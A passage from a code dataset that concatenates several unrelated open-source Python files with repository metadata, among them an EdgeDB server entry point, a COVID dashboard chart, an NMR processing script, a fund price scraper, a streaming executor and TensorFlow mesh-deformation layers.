second_list.append(UI.ListPrompt(key[1], i[1]))
prompt_sequence.append(UI.EmbeddedListPrompt(key[0], first_list, second_list))
else:
raise TypeError("Unsuported key type")
# TODO: not good as well
prompt_sequence.append(UI.ValuePrompt("Amount"))
return prompt_sequence
| 30.4375 | 90 | 0.584189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 93 | 0.095483 |
33da0396a0dd60ccaa2bda8746e876166518de49 | 934 | py | Python | src/dash/pages/page1/layout/piecases.py | NjekTt/iris-python-dashboards | fde650bb1e0a58504230aaba6b4d8312c9f965a6 | [
"MIT"
] | null | null | null | src/dash/pages/page1/layout/piecases.py | NjekTt/iris-python-dashboards | fde650bb1e0a58504230aaba6b4d8312c9f965a6 | [
"MIT"
] | null | null | null | src/dash/pages/page1/layout/piecases.py | NjekTt/iris-python-dashboards | fde650bb1e0a58504230aaba6b4d8312c9f965a6 | [
"MIT"
] | null | null | null | import dash_bootstrap_components as dbc
from dash import dcc
import plotly.graph_objects as go
import iris
query = ("""SELECT
location,
CAST(total_cases AS int) as total_cases,
CAST(total_deaths as int) as total_deaths,
CAST(total_vaccinations AS int) as total_vaccinations
FROM Data.Covid19 WHERE continent != ''""")
df = (iris.sql.exec(query).dataframe().rename(columns={
"total_cases": "Total cases",
"total_deaths": "Total deaths",
"total_vaccinations": "Total vaccinations"
}))
def getFigure(countries):
data = df[df['location'].isin(countries)] if countries else df
fig = go.Figure(data=[go.Pie(
labels=['Total vaccinations', 'Total deaths', 'Total cases'],
textinfo='label+percent',
values=[data['Total vaccinations'].sum(), data['Total deaths'].sum(), data['Total cases'].sum()],
)])
fig.update_layout(title_text="Count by type")
return fig
| 28.30303 | 105 | 0.680942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 449 | 0.480728 |
33da4874a5acfe6e3de2316a08fa8e0d7edcedd6 | 13,573 | py | Python | edb/server/main.py | rongfengliang/edgedb-pg-expose | 1ddc279511595b4b1a3a1532ea873ed4e05e8b01 | [
"Apache-2.0"
] | null | null | null | edb/server/main.py | rongfengliang/edgedb-pg-expose | 1ddc279511595b4b1a3a1532ea873ed4e05e8b01 | [
"Apache-2.0"
] | null | null | null | edb/server/main.py | rongfengliang/edgedb-pg-expose | 1ddc279511595b4b1a3a1532ea873ed4e05e8b01 | [
"Apache-2.0"
] | null | null | null | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import asyncio
import contextlib
import getpass
import logging
import os
import os.path
import pathlib
import setproctitle
import signal
import socket
import sys
import tempfile
import uvloop
import click
from edb.common import devmode
from edb.common import exceptions
from . import buildmeta
from . import cluster as edgedb_cluster
from . import daemon
from . import defines
from . import logsetup
logger = logging.getLogger('edb.server')
_server_initialized = False
def abort(msg, *args):
logger.critical(msg, *args)
sys.exit(1)
def terminate_server(server, loop):
loop.stop()
def _ensure_runstate_dir(data_dir, runstate_dir):
if runstate_dir is None:
try:
runstate_dir = buildmeta.get_runstate_path(data_dir)
except buildmeta.MetadataError:
abort(
f'cannot determine the runstate directory location; '
f'please use --runstate-dir to specify the correct location')
runstate_dir = pathlib.Path(runstate_dir)
if not runstate_dir.exists():
if not runstate_dir.parent.exists():
abort(
f'cannot create the runstate directory: '
f'{str(runstate_dir.parent)!r} does not exist; please use '
f'--runstate-dir to specify the correct location')
try:
runstate_dir.mkdir()
except PermissionError as ex:
abort(
f'cannot create the runstate directory: '
f'{ex!s}; please use --runstate-dir to specify '
f'the correct location')
if not os.path.isdir(runstate_dir):
abort(f'{str(runstate_dir)!r} is not a directory; please use '
f'--runstate-dir to specify the correct location')
return runstate_dir
@contextlib.contextmanager
def _internal_state_dir(runstate_dir):
try:
with tempfile.TemporaryDirectory(prefix='internal-',
dir=runstate_dir) as td:
yield td
except PermissionError as ex:
abort(f'cannot write to the runstate directory: '
f'{ex!s}; please fix the permissions or use '
f'--runstate-dir to specify the correct location')
def _init_cluster(cluster, args) -> bool:
from edb.server import bootstrap
bootstrap_args = {
'default_database': (args['default_database'] or
args['default_database_user']),
'default_database_user': args['default_database_user'],
'testmode': args['testmode'],
'insecure': args['insecure'],
}
need_restart = asyncio.run(bootstrap.bootstrap(cluster, bootstrap_args))
global _server_initialized
_server_initialized = True
return need_restart
def _sd_notify(message):
notify_socket = os.environ.get('NOTIFY_SOCKET')
if not notify_socket:
return
if notify_socket[0] == '@':
notify_socket = '\0' + notify_socket[1:]
sd_sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sd_sock.connect(notify_socket)
try:
sd_sock.sendall(message.encode())
finally:
sd_sock.close()
def _init_parsers():
# Initialize all parsers, rebuilding grammars if
# necessary. Do it earlier than later so that we don't
# end up in a situation where all our compiler processes
# are building parsers in parallel.
from edb.edgeql import parser as ql_parser
ql_parser.preload()
def _run_server(cluster, args, runstate_dir, internal_runstate_dir):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
# Import here to make sure that most of imports happen
# under coverage (if we're testing with it). Otherwise
# coverage will fail to detect that "import edb..." lines
# actually were run.
from . import server
ss = server.Server(
loop=loop,
cluster=cluster,
runstate_dir=runstate_dir,
internal_runstate_dir=internal_runstate_dir,
max_backend_connections=args['max_backend_connections'],
nethost=args['bind_address'],
netport=args['port'],
)
loop.run_until_complete(ss.init())
try:
loop.run_until_complete(ss.start())
except Exception:
loop.run_until_complete(ss.stop())
raise
loop.add_signal_handler(signal.SIGTERM, terminate_server, ss, loop)
# Notify systemd that we've started up.
_sd_notify('READY=1')
try:
loop.run_forever()
finally:
loop.run_until_complete(ss.stop())
except KeyboardInterrupt:
logger.info('Shutting down.')
_sd_notify('STOPPING=1')
def run_server(args):
ver = buildmeta.get_version()
if devmode.is_in_dev_mode():
logger.info(f'EdgeDB server ({ver}) starting in DEV mode.')
else:
logger.info(f'EdgeDB server ({ver}) starting.')
_init_parsers()
pg_cluster_init_by_us = False
pg_cluster_started_by_us = False
try:
server_settings = {
'log_connections': 'yes',
'log_statement': 'all',
'log_disconnections': 'yes',
'log_min_messages': 'INFO',
'client_min_messages': 'INFO',
'listen_addresses': '', # we use Unix sockets
'unix_socket_permissions': '0700',
# We always enforce UTC timezone:
# * timestamptz is stored in UTC anyways;
# * this makes the DB server more predictable.
'TimeZone': 'UTC',
'default_transaction_isolation': 'repeatable read',
# TODO: EdgeDB must manage/monitor all client connections and
# have its own "max_connections". We'll set this setting even
# higher when we have that fully implemented.
'max_connections': '500',
}
cluster = edgedb_cluster.get_pg_cluster(args['data_dir'])
cluster_status = cluster.get_status()
if cluster_status == 'not-initialized':
logger.info(
'Initializing database cluster in %s', args['data_dir'])
initdb_output = cluster.init(
username='postgres', locale='C', encoding='UTF8')
for line in initdb_output.splitlines():
logger.debug('initdb: %s', line)
cluster.reset_hba()
cluster.add_hba_entry(
type='local',
database='all',
user='postgres',
auth_method='trust'
)
cluster.add_hba_entry(
type='local',
database='all',
user=defines.EDGEDB_SUPERUSER,
auth_method='trust'
)
pg_cluster_init_by_us = True
cluster_status = cluster.get_status()
data_dir = cluster.get_data_dir()
if args['runstate_dir']:
specified_runstate_dir = args['runstate_dir']
elif args['bootstrap']:
# When bootstrapping a new EdgeDB instance it is often necessary
# to avoid using the main runstate dir due to lack of permissions,
# possibility of conflict with another running instance, etc.
# The --bootstrap mode is also often runs unattended, i.e.
# as a post-install hook during package installation.
specified_runstate_dir = data_dir
else:
specified_runstate_dir = None
runstate_dir = _ensure_runstate_dir(data_dir, specified_runstate_dir)
with _internal_state_dir(runstate_dir) as internal_runstate_dir:
server_settings['unix_socket_directories'] = args['data_dir']
if cluster_status == 'stopped':
cluster.start(
port=edgedb_cluster.find_available_port(),
server_settings=server_settings)
pg_cluster_started_by_us = True
elif cluster_status != 'running':
abort('Could not start database cluster in %s',
args['data_dir'])
cluster.override_connection_spec(
user='postgres', database='template1')
need_cluster_restart = _init_cluster(cluster, args)
if need_cluster_restart and pg_cluster_started_by_us:
logger.info('Restarting server to reload configuration...')
cluster_port = cluster.get_connection_spec()['port']
cluster.stop()
cluster.start(
port=cluster_port,
server_settings=server_settings)
if not args['bootstrap']:
_run_server(cluster, args, runstate_dir, internal_runstate_dir)
except BaseException:
if pg_cluster_init_by_us and not _server_initialized:
logger.warning('server bootstrap did not complete successfully, '
'removing the data directory')
if cluster.get_status() == 'running':
cluster.stop()
cluster.destroy()
raise
if pg_cluster_started_by_us:
cluster.stop()
_server_options = [
click.option(
'-D', '--data-dir', type=str, envvar='EDGEDB_DATADIR',
help='database cluster directory'),
click.option(
'-l', '--log-level',
help=('Logging level. Possible values: (d)ebug, (i)nfo, (w)arn, '
'(e)rror, (s)ilent'),
default='i', envvar='EDGEDB_LOG_LEVEL'),
click.option(
'--log-to',
help=('send logs to DEST, where DEST can be a file name, "syslog", '
'or "stderr"'),
type=str, metavar='DEST', default='stderr'),
click.option(
'--bootstrap', is_flag=True,
help='bootstrap the database cluster and exit'),
click.option(
'--default-database', type=str, default=getpass.getuser(),
help='the name of the default database to create'),
click.option(
'--default-database-user', type=str, default=getpass.getuser(),
help='the name of the default database owner'),
click.option(
'--devmode/--no-devmode',
help='enable or disable the development mode',
default=None),
click.option(
'--testmode/--no-testmode',
help='enable or disable the test mode',
default=False),
click.option(
'-I', '--bind-address', type=str, default=None,
help='IP address to listen on', envvar='EDGEDB_BIND_ADDRESS'),
click.option(
'-p', '--port', type=int, default=None,
help='port to listen on'),
click.option(
'-b', '--background', is_flag=True, help='daemonize'),
click.option(
'--pidfile', type=str, default='/run/edgedb/',
help='path to PID file directory'),
click.option(
'--daemon-user', type=int),
click.option(
'--daemon-group', type=int),
click.option(
'--runstate-dir', type=str, default=None,
help=('directory where UNIX sockets will be created '
'("/run" on Linux by default)')),
click.option(
'--max-backend-connections', type=int, default=100),
]
def server_options(func):
for option in reversed(_server_options):
func = option(func)
return func
def server_main(*, insecure=False, **kwargs):
logsetup.setup_logging(kwargs['log_level'], kwargs['log_to'])
exceptions.install_excepthook()
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
if kwargs['devmode'] is not None:
devmode.enable_dev_mode(kwargs['devmode'])
if not kwargs['data_dir']:
if devmode.is_in_dev_mode():
kwargs['data_dir'] = os.path.expanduser('~/.edgedb')
else:
abort('Please specify the instance data directory '
'using the -D argument')
kwargs['insecure'] = insecure
if kwargs['background']:
daemon_opts = {'detach_process': True}
pidfile = os.path.join(
kwargs['pidfile'], '.s.EDGEDB.{}.lock'.format(kwargs['port']))
daemon_opts['pidfile'] = pidfile
if kwargs['daemon_user']:
daemon_opts['uid'] = kwargs['daemon_user']
if kwargs['daemon_group']:
daemon_opts['gid'] = kwargs['daemon_group']
with daemon.DaemonContext(**daemon_opts):
setproctitle.setproctitle(
'edgedb-server-{}'.format(kwargs['port']))
run_server(kwargs)
else:
with devmode.CoverageConfig.enable_coverage_if_requested():
run_server(kwargs)
@click.command(
'EdgeDB Server',
context_settings=dict(help_option_names=['-h', '--help']))
@server_options
def main(**kwargs):
server_main(**kwargs)
def main_dev():
devmode.enable_dev_mode()
main()
if __name__ == '__main__':
main()
| 31.861502 | 79 | 0.614308 | 0 | 0 | 412 | 0.030354 | 600 | 0.044205 | 0 | 0 | 4,635 | 0.341487 |
33dab9188feb6ecca15b0298623ede4011983a44 | 2,295 | py | Python | processing.py | BeDaBio/Topspin_Automatisation | d6c944c8533452540bad6c7900671ba84510da5d | [
"MIT"
] | 1 | 2021-07-01T12:40:46.000Z | 2021-07-01T12:40:46.000Z | processing.py | BeDaBio/Topspin_Automatisation | d6c944c8533452540bad6c7900671ba84510da5d | [
"MIT"
] | null | null | null | processing.py | BeDaBio/Topspin_Automatisation | d6c944c8533452540bad6c7900671ba84510da5d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from TopCmds import *
import quality_check
import data_management as dat
Qualitytest = quality_check.Qualitytest
left_boundary=float(dat.get_globalParameter("left_boundary"))
right_boundary=float(dat.get_globalParameter("right_boundary"))
def Check_180turn(leftboundary,rightboundary):
""" turns the Spectrum for 180 degrees if Reference Region has an overall negative Signal"""
Intensities_of_reference=sum(GETPROCDATA(left_boundary,left_boundary))
if Intensities_of_reference < 0:
XCMD(".ph",WAIT_TILL_DONE) # opens phase correction mode
XCMD(".ph180",WAIT_TILL_DONE) # adds 180 degrees to ph0
XCMD(".sret",WAIT_TILL_DONE) # adjusts Spectrum according to ph and safes result
# Processing of CPMG data
@quality_check.conditional_decorator(quality_check.Quality,quality_check.Quality_lifted,Qualitytest)
def proz():
"""processing pipeline for CPMG data"""
print("processing: ",CURDATA()[0])
Check_180turn(left_boundary,right_boundary)
EF() #exponential window multiplication + fourier
APK0() #1. Phase correction 0th Ordnung
APK1() #1. Phase correction 1st Ordnung
ABS() #Baseline correction
APK()
ABS() #Baseline correction
Check_180turn(left_boundary,right_boundary)
def proz2D():
"""processing pipeline for CPMG data"""
print("processing: ",CURDATA()[0])
XCMD("apk2d",WAIT_TILL_DONE)
ABS2() #Baseline correction
ABS1()
# Processing of NOESY data
@quality_check.conditional_decorator(quality_check.Quality,quality_check.Quality_lifted,Qualitytest)
def proz_noe():
"""processing pipeline for NOESY data"""
print("processing: ",CURDATA()[0])
Check_180turn(left_boundary,right_boundary)
EFP() # Exponential window multiplication + Fourier Transformation + phase correction
ABS() # Baseline correction
Check_180turn(left_boundary,right_boundary)
# After manual processing
@quality_check.conditional_decorator(quality_check.Quality,quality_check.Quality_lifted,Qualitytest)
def proz_manually ():
"""processing pipeline used after manual phase correction"""
Check_180turn(left_boundary,right_boundary)
ABS() # Baseline correction
XCMD("closeall",WAIT_TILL_DONE)
| 38.898305 | 101 | 0.735076 | 0 | 0 | 0 | 0 | 1,257 | 0.547712 | 0 | 0 | 894 | 0.389542 |
33df118b9dd2d5dc3e199ff68c543e1b12e24f1b | 389 | py | Python | accounts/migrations/0007_rename_protected_authtoggle_is_protected.py | abubakarA-Dot/tarot_juicer | dbc68f73d6ae3d73f50f4472a063b5363febc7b8 | [
"MIT"
] | 4 | 2020-02-27T00:11:01.000Z | 2020-05-11T07:59:55.000Z | accounts/migrations/0007_rename_protected_authtoggle_is_protected.py | abubakarA-Dot/tarot_juicer | dbc68f73d6ae3d73f50f4472a063b5363febc7b8 | [
"MIT"
] | 16 | 2019-12-20T06:57:54.000Z | 2020-05-19T01:00:18.000Z | accounts/migrations/0007_rename_protected_authtoggle_is_protected.py | abubakarA-Dot/tarot_juicer | dbc68f73d6ae3d73f50f4472a063b5363febc7b8 | [
"MIT"
] | 10 | 2019-12-25T23:38:33.000Z | 2020-05-11T14:15:15.000Z | # Generated by Django 3.2.4 on 2021-11-02 08:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_rename_on_authtoggle_protected'),
]
operations = [
migrations.RenameField(
model_name='authtoggle',
old_name='protected',
new_name='is_protected',
),
]
| 20.473684 | 60 | 0.611825 | 304 | 0.781491 | 0 | 0 | 0 | 0 | 0 | 0 | 131 | 0.336761 |
33df6bcd5e294420051bcaaf7ff2ab223d4ccacb | 6,509 | py | Python | fund.py | JS-WangZhu/Fund | 9ec7c06998f23e827d72f5a40f357ce8950b61f5 | [
"Apache-2.0"
] | 9 | 2020-08-11T11:07:06.000Z | 2021-08-06T08:28:50.000Z | fund.py | JS-WangZhu/Fund | 9ec7c06998f23e827d72f5a40f357ce8950b61f5 | [
"Apache-2.0"
] | null | null | null | fund.py | JS-WangZhu/Fund | 9ec7c06998f23e827d72f5a40f357ce8950b61f5 | [
"Apache-2.0"
] | 2 | 2020-08-18T06:56:25.000Z | 2021-01-12T12:07:36.000Z | import os
import pickle
import requests
from bs4 import BeautifulSoup
import re
import prettytable as pt
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import warnings
from colorama import init, Fore, Back, Style
warnings.filterwarnings("ignore")
import time
chrome_options=Options()
#设置chrome浏览器无界面模式
# chrome_options.add_argument('--headless')
#-----------------------------------------------------
#根据实际情况修改,修改值为phantomjs的解压目录/bin/phantomjs
executable_path = '/Users/wangzhu/myFile/OpenPackages/phantomjs-2.1.1-macosx/bin/phantomjs'
#--------等待网页加载时间,根据个人的网络情况自行设定,单位是秒
wait_time = 1
#-----------------------------------------------------
# 定义颜色类
init(autoreset=False)
class Colored(object):
# 前景色:红色 背景色:默认
def red(self, s):
return Fore.LIGHTRED_EX + s + Fore.RESET
# 前景色:绿色 背景色:默认
def green(self, s):
return Fore.LIGHTGREEN_EX + s + Fore.RESET
def yellow(self, s):
return Fore.LIGHTYELLOW_EX + s + Fore.RESET
def white(self,s):
return Fore.LIGHTWHITE_EX + s + Fore.RESET
def blue(self,s):
return Fore.LIGHTBLUE_EX + s + Fore.RESET
# 获取所有基金信息
def get_allinfo():
url = 'http://fund.eastmoney.com/allfund.html'
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
res = requests.get(url,headers=headers)
soup = BeautifulSoup(res.content, 'lxml',from_encoding="gb18030")
all_info = soup.find_all('ul', class_='num_right')
fund_info = [[],[],[]]
for e in all_info:
el = e.find_all('a')
for single in el:
try:
s_url = single['href']
s_text = single.get_text()
number = s_text.split(')')[0][1:]
name = s_text.split(')')[1]
except:
continue
fund_info[0].append(number)
fund_info[1].append(name)
fund_info[2].append(s_url)
pickle.dump(fund_info,open('fund_info.pkl','wb'))
if os.path.exists('./fund_info.pkl'):
fund_info = pickle.load(open('fund_info.pkl','rb'))
# print('INFO--基金信息缓存导入成功')
else:
print('正在创建基金信息表')
get_allinfo()
print('INFO--基金信息表创建成功')
fund_info = pickle.load(open('fund_info.pkl','rb'))
print('INFO--基金信息缓存导入成功')
# 获取净值和估值
def get_value(url,executable_path):
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
#proxies={'http':'http://113.195.20.205:9999','http':'http://123.55.102.44:9999'}
#res = requests.get(url,headers=headers,proxies=proxies)
browser = webdriver.PhantomJS(executable_path=executable_path)
# browser = webdriver.Chrome(options=chrome_options)
browser.get(url)
js = 'document.getElementsByClassName("ip_tips_btn")[1].getElementsByTagName("span")[0].click()'
browser.execute_script(js)
time.sleep(wait_time)
res = browser.page_source
soup = BeautifulSoup(res, 'html.parser',from_encoding="gb18030")
dataOfFund = soup.find_all('div', class_='dataOfFund')
guzhi = dataOfFund[0].select('#gz_gszzl')[0].get_text()
gutime = dataOfFund[0].select('#gz_gztime')[0].get_text()[5:]
jing = dataOfFund[0].find_all('span',class_='ui-font-middle')[4]
jingzhi = jing.get_text()
jingzhi_t = soup.find_all('dl', class_='dataItem02')
jingtime = re.findall('\</span>(.*?)\)',str(jingzhi_t[0]))[0][14:]
return guzhi,gutime,jingzhi,jingtime
def getUrl(no):
ind = 0
for index in range(len(fund_info[0])):
if str(fund_info[0][index])==str(no):
ind = index
return fund_info[1][ind],fund_info[2][ind]
def getDapan(executable_path):
url = 'http://quote.eastmoney.com/center/qqzs.html'
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
browser = webdriver.PhantomJS(executable_path=executable_path)
# browser = webdriver.Chrome(chrome_options=chrome_options)
browser.get(url)
res = browser.page_source
soup = BeautifulSoup(res, 'lxml',from_encoding="gb18030")
dataTables = soup.find_all('tbody')
jiage = dataTables[0].find_all('td','mywidth2')
shangz_jg = jiage[0].get_text()
shangz_zd = jiage[1].get_text()
shenz_jg = jiage[2].get_text()
shenz_zd = jiage[3].get_text()
chuangyb_jg = jiage[6].get_text()
chuangyb_zd = jiage[7].get_text()
return shangz_jg,shangz_zd,shenz_jg,shenz_zd,chuangyb_jg,chuangyb_zd
# 判断基金红绿 flag=1,估值 flag=0,净值 用于优化终端显示效果
def compareNum(s,flag=0):
color = Colored()
if s!='--':
if float(str(s)[:-1])>0.00:
if flag==1:
return color.red('+'+s)
else:
return color.red(s)
elif float(str(s)[:-1])<0.00:
return color.green(s)
else:
return color.white(s)
else:
return color.white(s)
# 判断大盘红绿
def compareDapanNum(s1,s2):
color = Colored()
if float(str(s1)[:-1])>0.00:
return color.red('+'+s1),color.red(s2)
elif float(str(s1)[:-1])<0.00:
return color.green(s1),color.green(s2)
else:
return color.white(s1),color.white(s2)
if os.path.exists('./my.txt'):
f = open('./my.txt','r')
shangz_jg,shangz_zd,shenz_jg,shenz_zd,chuangyb_jg,chuangyb_zd = getDapan(executable_path)
shangz_zd,shangz_jg = compareDapanNum(shangz_zd,shangz_jg)
shenz_zd,shenz_jg = compareDapanNum(shenz_zd,shenz_jg)
chuangyb_zd,chuangyb_jg = compareDapanNum(chuangyb_zd,chuangyb_jg)
tb = pt.PrettyTable()
tb.field_names = ["基金代码", "基金名称", "估值", "估值更新", "净值", "净值更新"]
content = f.readlines()
for i in content:
if str(i).endswith('\n'):
i = i[:-1]
tmpName,tmpUrl = getUrl(str(i))
try:
guzhi,gutime,jingzhi,jingtime = get_value(tmpUrl, executable_path)
except:
continue
guzhi = compareNum(guzhi,flag=0)
jingzhi = compareNum(jingzhi,flag=1)
tb.add_row([i,tmpName,guzhi,gutime,jingzhi,jingtime])
tb1 = pt.PrettyTable(['大盘','上证指数','深证成指','创业板指'])
tb1.add_row(['价格',shangz_jg,shenz_jg,chuangyb_jg])
tb1.add_row(['涨幅',shangz_zd,shenz_zd,chuangyb_zd])
print(tb1)
print(tb)
else:
print('请在执行目录下创建my.txt,并按格式写入内容')
print('格式:每行填写一个基金号码,结尾不留空行,以utf-8编码保存')
print('创建成功后请重新执行此程序') | 34.62234 | 147 | 0.634199 | 475 | 0.067712 | 0 | 0 | 0 | 0 | 0 | 0 | 2,277 | 0.32459 |
33e151bf11eaa61f605f33dd483e62cdd9902fec | 6,161 | py | Python | src/streamexecutors/stream.py | pkch/executors | 326677ab98de374314bfa76e75624a705c34bdda | [
"MIT"
] | 1 | 2017-07-17T14:11:18.000Z | 2017-07-17T14:11:18.000Z | src/streamexecutors/stream.py | pkch/executors | 326677ab98de374314bfa76e75624a705c34bdda | [
"MIT"
] | 3 | 2017-05-29T10:24:36.000Z | 2017-05-30T09:20:11.000Z | src/streamexecutors/stream.py | pkch/executors | 326677ab98de374314bfa76e75624a705c34bdda | [
"MIT"
] | 1 | 2020-11-21T18:53:52.000Z | 2020-11-21T18:53:52.000Z | import time
from queue import Queue, Full, Empty
from concurrent.futures import Executor, ThreadPoolExecutor, ProcessPoolExecutor
from concurrent.futures.process import _get_chunks, _process_chunk
from functools import partial
import sys
import contextlib
import threading
import itertools
class StreamExecutor(Executor):
def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
"""Returns an iterator equivalent to map(fn, iter).
Args:
fn: A callable that will take as many arguments as there are
passed iterables.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
chunksize: The size of the chunks the iterable will be broken into
before being passed to a child process. This argument is only
used by ProcessPoolExecutor; it is ignored by
ThreadPoolExecutor.
buffer_size: The maximum number of input items that may be
stored at once; default is a small buffer; 0 for no limit. The
drawback of using a large buffer is the possibility of wasted
computation and memory (in case not all input is needed), as
well as higher peak memory usage.
Returns:
An iterator equivalent to: map(func, *iterables) but the calls may
be evaluated out-of-order.
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
Exception: If fn(*args) raises for any values.
"""
if not callable(fn):
raise TypeError('fn argument must be a callable')
if timeout is None:
end_time = None
else:
end_time = timeout + time.time()
if buffer_size is None:
buffer_size = -1
elif buffer_size <= 0:
raise ValueError('buffer_size must be a positive number')
current_thread = threading.current_thread()
iterators = [iter(iterable) for iterable in iterables]
# Deadlocks on the two queues are avoided using the following rule.
# The writer guarantees to place a sentinel value into the buffer
# before exiting, and to write nothing after that; the reader
# guarantees to read the queue until it encounters a sentinel value
# and to stop reading after that. Any value of type BaseException is
# treated as a sentinel.
future_buffer = Queue(maxsize=buffer_size)
cancel = False
# This function will run in a separate thread.
def consume_inputs():
nonlocal cancel
while not cancel:
future = None
try:
args = [next(iterator) for iterator in iterators]
except BaseException as e:
# StopIteration represents exhausted input; any other
# exception is due to an error in the input generator. We
# forward the exception downstream so it can be raised
# when client iterates through the result of map.
future = e
if not future:
try:
future = self.submit(fn, *args)
except BaseException as e:
# E.g., RuntimeError from shut down executor.
# Forward the new exception downstream.
future = e
while True:
try:
future_buffer.put(future, timeout=1)
except Full:
if cancel or not current_thread.is_alive():
cancel = True
break
else:
continue
if isinstance(future, BaseException):
return
else:
break
while True:
try:
future = future_buffer.get(block=False)
except Empty:
return
if isinstance(future, BaseException):
return
future.cancel()
# Instances of this class will be created and their methods executed in the main thread.
class Producer:
def __next__(self):
nonlocal cancel
future = future_buffer.get()
if isinstance(future, BaseException):
# Reraise upstream exceptions at the map call site.
raise future
if end_time is None:
remaining_timeout = None
else:
remaining_timeout = end_time - time.time()
# Any exceptions (errors in the callable fn, TimeOut,
# GeneratorExit) will be raised at map call site.
try:
return future.result(remaining_timeout)
except BaseException:
cancel = True
raise
def __iter__(self):
return self
def __del__(self):
nonlocal cancel
cancel = True
thread = threading.Thread(target=consume_inputs)
thread.start()
return Producer()
class StreamThreadPoolExecutor(StreamExecutor, ThreadPoolExecutor): ...
class StreamProcessPoolExecutor(StreamExecutor, ProcessPoolExecutor):
def map(self, fn, *iterables, timeout=None, chunksize=1, buffer_size=10000):
if buffer_size is not None:
buffer_size //= max(1, chunksize)
if chunksize < 1:
raise ValueError("chunksize must be >= 1.")
results = super().map(partial(_process_chunk, fn),
_get_chunks(*iterables, chunksize=chunksize),
timeout=timeout, buffer_size=buffer_size)
return itertools.chain.from_iterable(results)
| 41.073333 | 96 | 0.557377 | 5,863 | 0.951631 | 0 | 0 | 0 | 0 | 0 | 0 | 2,285 | 0.370881 |
33e2f0f698434b23dcdf1b8b069d6bb70c09f05a | 29,581 | py | Python | src/custom_layers.py | fkong7/HeartFFDNet | 8257ce71a0a3449d1b3a7c040699af3da35bd4b5 | [
"Apache-2.0"
] | 12 | 2021-07-13T17:40:17.000Z | 2022-03-05T12:13:30.000Z | src/custom_layers.py | fkong7/HeartFFDNet | 8257ce71a0a3449d1b3a7c040699af3da35bd4b5 | [
"Apache-2.0"
] | 2 | 2022-03-03T15:17:58.000Z | 2022-03-22T09:22:46.000Z | src/custom_layers.py | fkong7/HeartFFDNet | 8257ce71a0a3449d1b3a7c040699af3da35bd4b5 | [
"Apache-2.0"
] | 2 | 2021-09-28T14:56:04.000Z | 2021-11-18T09:52:44.000Z | #Copyright (C) 2021 Fanwei Kong, Shawn C. Shadden, University of California, Berkeley
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import tensorflow as tf
import tensorflow.contrib as tfcontrib
from tensorflow.python.keras import layers
from tensorflow.python.keras import models
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import regularizers
import tf_utils
import numpy as np
def dot(x, y, sparse=False):
"""Wrapper for tf.matmul (sparse vs dense)."""
if sparse:
# res = tf.sparse_tensor_dense_matmul(x, y)
res = tf_utils.sparse_tensor_dense_tensordot(x, y, axes=[[1], [1]])
res = tf.transpose(res, perm=[1,0,2])
else:
# res = tf.matmul(x, y)
res = tf.tensordot(x, y, axes=1)
#res = tf.transpose(res, perm=[1,0,2])
return res
from math import factorial
def comb(n, k):
return factorial(n) / factorial(k) / factorial(n - k)
class MatMul(layers.Layer):
def __init__(self,matrix, sparse=False, **kwargs):
super(MatMul, self).__init__(**kwargs)
self.matrix = matrix
self.sparse = sparse
def get_config(self):
config = {'matrix': self.matrix, 'sparse': self.sparse}
base_config = super(MatMul, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
super(MatMul, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
if self.sparse:
output = dot(self.matrix, x, self.sparse)
else:
matrix = tf.expand_dims(tf.constant(self.matrix, tf.float32), axis=0)
output = tf.matmul(matrix, x)
return output
def compute_output_shape(self, input_shape):
output_shape = tf.identity(input_shape)
output_shape[1] = self.matrix.get_shape().as_list()[1]
return output_shape
class FFD(layers.Layer):
def __init__(self,ffd_matrix,scale_vec=None, offset=None, **kwargs):
super(FFD, self).__init__(**kwargs)
self.ffd_matrix = ffd_matrix
self.scale_vec = tf.expand_dims(tf.constant(scale_vec, tf.float32), axis=0) if scale_vec is not None else None
self.offset = tf.expand_dims(tf.constant(offset, tf.float32), axis=0) if offset is not None else None
def get_config(self):
config = {'ffd_matrix': self.ffd_matrix, 'scale_vec': self.scale_vec,
'offset': self.offset}
base_config = super(FFD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def build(self, input_shape):
self.batch_size = input_shape[0]
super(FFD, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
if self.scale_vec is not None:
x = x * self.scale_vec
if self.offset is not None:
x = x - self.offset
